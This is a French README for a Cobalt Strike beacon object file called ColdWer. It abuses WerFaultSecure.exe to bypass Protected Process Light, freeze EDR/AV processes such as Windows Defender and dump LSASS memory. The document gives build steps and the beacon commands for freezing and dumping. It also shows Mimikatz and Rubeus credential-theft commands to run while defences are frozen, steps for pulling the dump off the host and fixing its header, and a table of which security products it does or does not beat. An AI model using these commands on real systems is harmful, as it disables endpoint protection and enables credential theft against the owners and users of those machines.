
BOF Cobalt Strike pour geler les processus EDR/AV et extraire LSASS en utilisant le contournement PPL de WerFaultSecure.exe
Une guerre froide sur votre endpoint.
ColdWer exploite le contournement PPL de WerFaultSecure.exe pour geler les processus EDR/AV et dump la mémoire LSASS sur les systèmes Windows modernes.
C O L D W E R
└─┴─┴── WerFaultSecure
└─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)
Gelez votre EDR/AV. Extrayez ce dont vous avez besoin. Restez froid.
Sh3llf1r3 (@0xsh3llf1r3)
Ce projet s'appuie sur les recherches de TwoSevenOneT (@TwoSevenOneT) :
| Projet | Description |
|---|---|
| EDR-Freeze | Technique originale de gel EDR |
| WSASS | Dump LSASS via WerFaultSecure |
Tout le crédit pour les techniques sous-jacentes revient à TwoSevenOneT.
git clone https://github.com/0xsh3llf1r3/ColdWer.git
cw/coldwer.cna# Naviguez vers le répertoire source
cd src/
# Compilez le BOF (nécessite MinGW)
make
# Ou manuellement :
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o
coldwer.o et coldwer.cnacoldwer.cna dans Cobalt Strike# Trouver le PID de Windows Defender
beacon> ps
# Geler le processus
beacon> cw-freeze 1337
# Exécutez vos commandes pendant que l'EDR/AV est gelé
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage
# Dégeler une fois terminé
beacon> cw-unfreeze
# Étape 1 : Téléchargez le WerFaultSecure.exe de Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe
# Étape 2 : Trouvez le PID de LSASS
beacon> ps
# Étape 3 : Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# Étape 4 : Téléchargez le dump
beacon> download C:\Windows\Temp\lsass.dmp
Modifiez l'en-tête du fichier pour restaurer le format minidump :
| Original (PNG) | Remplacer par (MDMP) |
|---|---|
89 50 4E 47 | 4D 44 4D 50 |
Commandes de restauration de l'en-tête :
| Méthode | Commande |
|---|---|
| Python | open('lsass.dmp','r+b').write(b'MDMP') |
| Bash | printf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc |
| PowerShell | $f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close() |
Analysez ensuite avec Mimikatz :
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords
| Commande | Description |
|---|---|
cw-freeze <PID> [Chemin] | Geler un processus |
cw-unfreeze | Dégeler le processus précédemment gelé |
cw-dump <PID> <Chemin> | Dumper la mémoire LSASS |
# Geler avec le chemin par défaut
beacon> cw-freeze 1337
# Utiliser un WerFaultSecure.exe personnalisé
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe
# Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# Dégeler une fois terminé
beacon> cw-unfreeze
| Cible | Statut |
|---|---|
| Windows Defender (MsMpEng.exe) | ✅ Fonctionne |
| LSASS (lsass.exe) | ✅ Fonctionne |
| Autres processus PPL | ✅ Fonctionne |
Ne fonctionne PAS contre les EDR avec auto-protection en mode noyau :
| EDR | Statut |
|---|---|
| Elastic Endpoint | ❌ Bloqué |
| CrowdStrike Falcon | ❌ Bloqué |
| SentinelOne | ❌ Bloqué |
| Carbon Black | ❌ Bloqué |
1. 🚀 Lancement de WerFaultSecure.exe en tant que PPL (niveau WinTcb)
↓
2. 🎯 WerFaultSecure s'attache au processus cible
↓
3. ⏸️ MiniDumpWriteDump suspend tous les threads cibles
↓
4. 🥶 Suspendre WerFaultSecure lui-même → La cible reste gelée
↓
5. ✅ Exécutez vos commandes (l'EDR/AV ne voit rien !)
↓
6. 🔥 Terminer WerFaultSecure → La cible se dégèle
| Version | Sortie |
|---|---|
| Windows 10/11 | Dump chiffré uniquement |
| Windows 8.1 | Dump brut non chiffré |
⚠️ POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Cet outil est destiné à :
- Des tests d'intrusion autorisés
- Des opérations Red Team avec autorisation écrite
- Des recherches en sécurité dans des environnements contrôlés
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
L'accès non autorisé à des systèmes informatiques est illégal.
Licence MIT - Voir LICENSE
🥶 Restez froid. Restez silencieux. 🥶
⭐ Mettez une étoile à ce dépôt si vous le trouvez utile ! ⭐
| Fonctionnalité | Description |
|---|
| ❄️ Geler | Met les processus EDR/AV en état de coma |
| 🔓 Dumper | Extrait la mémoire LSASS en contournant PPL |
| 🛡️ Contournement PPL | Exploite WerFaultSecure.exe au niveau WinTcb |
| ⚡ Rapide | Exécution BOF en ligne |
| 🎯 Contrôle manuel | Vous décidez quand geler et dégeler |
| Erreur | Cause | Solution |
|---|
| Fichier introuvable | Chemin invalide | Vérifiez le chemin de WerFaultSecure.exe |
| Accès refusé | Faibles privilèges | Exécutez en tant qu'Administrateur/SYSTEM |
| Signature invalide | Binaire non signé | Utilisez un WerFaultSecure.exe correctement signé |
| Le processus n'existe pas | Mauvais PID | Vérifiez le PID avec la commande ps |
| Cible protégée | Protection noyau | L'EDR a une auto-protection (non contournable) |
| Déjà gelé | État bloqué | Lancez d'abord cw-unfreeze |